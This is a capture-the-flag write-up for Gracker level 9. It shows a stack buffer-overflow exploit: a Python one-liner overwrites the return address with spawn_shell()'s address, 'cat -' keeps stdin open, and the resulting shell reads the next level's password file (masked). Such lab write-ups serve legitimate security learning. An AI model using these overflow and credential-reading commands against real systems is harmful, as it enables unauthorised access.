Gracker level9 (Buffer overflow - a pool with the lid closed)

Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.

We ssh to [email protected] and authenticate using the password we had obtained after solving the previous level.

Recap of previous level.

The recap of the previous level gives a different solution than mine. Do check it out too. In my solution, I was actually foolish not to notice that the password was present on the stack all this time.(not just the addresses near its address).

Level9

The story of this level tells us that the level is similar to level6, but with a minor change. We’ll just have to keep the STDIN alive. Let’s use the same exploit we used in the level6’s solution and see what happens. However this time around the address of spawn_shell() has changed it seems. Using that address in our exploit…

[email protected]:/matrix/level9$ objdump -d level9                     

level9:     file format elf32-i386

[...snip...]
 8048572:	83 c4 10             	add    $0x10,%esp
 8048575:	c9                   	leave  
 8048576:	e9 75 ff ff ff       	jmp    80484f0 <register_tm_clones>

0804857b <spawn_shell>:
 804857b:	55                   	push   %ebp
 804857c:	89 e5                	mov    %esp,%ebp
 804857e:	83 ec 18             	sub    $0x18,%esp
[...snip...]
[email protected]:/matrix/level9$(python -c "print 'A'*44 + '\x7b\x85\x04\x08'") | ./level9
Hello, I'm the MCP (Master Control Program). I'm here to protect the TRON system.
What are you doing here? Are you a user or a program?
Where did you come from? Proof your identity:
Return to: 0x804857b
Welcome to Arjia City!
zsh: done                          ( python -c "print 'A'*44 + '\x7b\x85\x04\x08'"; ) | 
zsh: illegal hardware instruction  ./level9
[email protected]:/matrix/level9$ 

The program exits before we are given the chance to input any commands in the shell. So we’ll have to find a way to keep the STDIN active. How about using the cat - command?

[email protected]:/matrix/level9$ (python -c "print 'A'*44 + '\x7b\x85\x04\x08'"; cat - ) | ./level9
Hello, I'm the MCP (Master Control Program). I'm here to protect the TRON system.
What are you doing here? Are you a user or a program?
Where did you come from? Proof your identity:
Return to: 0x804857b
Welcome to Arjia City!
whoami
level10
cat /home/level10/.pass
************
zsh: broken pipe                   ( python -c "print 'A'*44 + '\x7b\x85\x04\x08'"; cat -; ) | 
zsh: illegal hardware instruction  ./level9

And Voila! we have the password to the next level. I am not revealing the password here so that the readers try the challenge on their own.